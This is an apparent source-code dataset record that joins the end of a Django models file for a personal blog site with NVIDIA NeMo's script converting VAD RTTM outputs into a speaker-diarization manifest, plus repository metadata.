name_en = models.CharField(default="", max_length=20, verbose_name="名称英文", help_text="名称英文")
desc = models.CharField(default="", max_length=300, verbose_name="简介", help_text="简介")
avatar = models.ImageField(upload_to="base/avatar/image/%y/%m", null=True, blank=True, verbose_name="头像", help_text="100*100")
background = models.ImageField(upload_to="base/background/image/%y/%m", null=True, blank=True, verbose_name="背景图", help_text="333*125")
socials = models.ManyToManyField(MaterialSocial, through='BloggerSocial', through_fields=('blogger', 'social'))
masters = models.ManyToManyField(MaterialMaster, through='BloggerMaster', through_fields=('blogger', 'master'))
add_time = models.DateTimeField(auto_now_add=True, null=True, blank=True, verbose_name="添加时间", help_text="添加时间")
class Meta:
verbose_name = "个人信息"
verbose_name_plural = verbose_name + '列表'
def __str__(self):
return self.name
class BloggerSocial(models.Model):
name = models.CharField(default="", max_length=20, verbose_name="名称", help_text="名称")
blogger = models.ForeignKey(BloggerInfo, verbose_name="个人", help_text="个人")
social = models.ForeignKey(MaterialSocial, verbose_name="社交平台", help_text="社交平台")
index = models.IntegerField(default=0, verbose_name="顺序", help_text="顺序")
add_time = models.DateTimeField(auto_now_add=True, null=True, blank=True, verbose_name="添加时间", help_text="添加时间")
class Meta:
verbose_name = "社交信息"
verbose_name_plural = verbose_name + '列表'
def __str__(self):
return self.name
class BloggerMaster(models.Model):
name = models.CharField(default="", max_length=20, verbose_name="名称", help_text="名称")
blogger = models.ForeignKey(BloggerInfo, verbose_name="个人", help_text="个人")
master = models.ForeignKey(MaterialMaster, verbose_name="技能", help_text="技能")
index = models.IntegerField(default=0, verbose_name="顺序", help_text="顺序")
add_time = models.DateTimeField(auto_now_add=True, null=True, blank=True, verbose_name="添加时间", help_text="添加时间")
class Meta:
verbose_name = "技能信息"
verbose_name_plural = verbose_name + '列表'
def __str__(self):
return self.name
class SiteInfoNavigation(models.Model):
name = models.CharField(default="", max_length=20, verbose_name="名称", help_text="名称")
site = models.ForeignKey(SiteInfo, verbose_name="网站", help_text="网站")
navigation = models.ForeignKey(NavigationLink, verbose_name="导航", help_text="导航")
index = models.IntegerField(default=0, verbose_name="顺序", help_text="顺序")
add_time = models.DateTimeField(auto_now_add=True, null=True, blank=True, verbose_name="添加时间", help_text="添加时间")
class Meta:
verbose_name = "导航信息"
verbose_name_plural = verbose_name + '列表'
def __str__(self):
return self.name
class FriendLink(models.Model):
"""
友情链接
"""
name = models.CharField(max_length=30, verbose_name="名称", help_text="名称")
desc = models.CharField(max_length=100, verbose_name="简介", help_text="简介")
image = models.ImageField(upload_to="base/friendlink/image/%y/%m", null=True, blank=True, verbose_name="图片", help_text="图片")
url = models.URLField(max_length=200, verbose_name="链接", help_text="链接")
add_time = models.DateTimeField(auto_now_add=True, null=True, blank=True, verbose_name="添加时间", help_text="添加时间")
class Meta:
verbose_name = "友情链接"
verbose_name_plural = verbose_name + '列表'
def __str__(self):
return self.name
|
[
"i@coderap.com"
] |
i@coderap.com
|
2d24fc4a0d81288c02b7170e0b960d7804117ead
|
a807ce0fa3e3e9c3b558b2e977c05e60c3a667b1
|
/scripts/speaker_recognition/rttm_to_manifest.py
|
3d7b772b05b94d534edf34d0698165658d9e6063
|
[
"Apache-2.0"
] |
permissive
|
blisc/NeMo
|
630376e7555c0face994da2f6f9af5d8d31243c3
|
fadeb45c84d6b323d78e30475538455a88b7c151
|
refs/heads/rework_reqs
| 2023-08-17T00:03:39.248669
| 2021-08-12T15:15:06
| 2021-08-12T15:15:06
| 208,142,160
| 2
| 0
|
Apache-2.0
| 2022-02-03T16:30:33
| 2019-09-12T20:37:24
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 1,666
|
py
|
# Copyright (c) 2020, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
from nemo.collections.asr.parts.utils.speaker_utils import write_rttm2manifest
from nemo.utils import logging
"""
This file converts vad outputs to manifest file for speaker diarization purposes
present in vad output directory.
every vad line consists of start_time, end_time , speech/non-speech
"""
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument(
"--paths2rttm_files", help="path to vad output rttm-like files. Could be a list or a text file", required=True
)
parser.add_argument(
"--paths2audio_files",
help="path to audio files that vad was computed. Could be a list or a text file",
required=True,
)
parser.add_argument("--manifest_file", help="output manifest file name", type=str, required=True)
args = parser.parse_args()
write_rttm2manifest(args.paths2audio_files, args.paths2rttm_files, args.manifest_file)
logging.info("wrote {} file from vad output files present in {}".format(args.manifest_file, args.paths2rttm_files))
|
[
"noreply@github.com"
] |
blisc.noreply@github.com
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.